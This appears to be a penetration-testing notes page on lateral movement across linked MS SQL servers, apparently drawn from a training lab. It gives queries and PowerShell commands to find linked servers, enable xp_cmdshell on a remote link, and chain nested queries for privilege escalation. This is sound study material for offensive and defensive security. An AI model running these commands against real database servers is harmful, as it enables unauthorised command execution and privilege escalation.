search

MS SQL Lateral Movement

hashtag
Discover any links (linked sql servers)

SELECT srvname, srvproduct, rpcout FROM master..sysservers;
EXEC sp_linkedservers

This shows a link to sql-1.cyberbotic.io

hashtag
Query linked server using module

powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

hashtag
Enable xp_cmdshell on linked server

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] 
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

hashtag
Get linked server details

Get-SQLServerLink -Instance sql11 -Verbose

DatabaseLinkName       : SQL27
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
LocalLogin             : webapp11
RemoteLoginName        : webappGroup

In this case, local user 'webapp11' has access to linked server SQL27, it's remote name will be 'webappGroup'.

hashtag
Come home to me

circle-info

SQL server links are not bidirectional by default

Execute a query on dc01 and inside that, we’ll use it again to execute a query on appsrv01

Nested AT commands, we execute a query on appsrv01 to linked server dc01 to linked server appsrv01.

It is also important to notice the use of single quotes in the SQL query. We have to escape all embedded single quotes with single quotes, which means the inner string (show advanced options) needs four single quotes.

Add SA2 user for easy access to database 1

circle-info

If no other privilege escalation paths are possible, we may be able to use a bidirectional link to elevate privileges on the same SQL server.

Last updated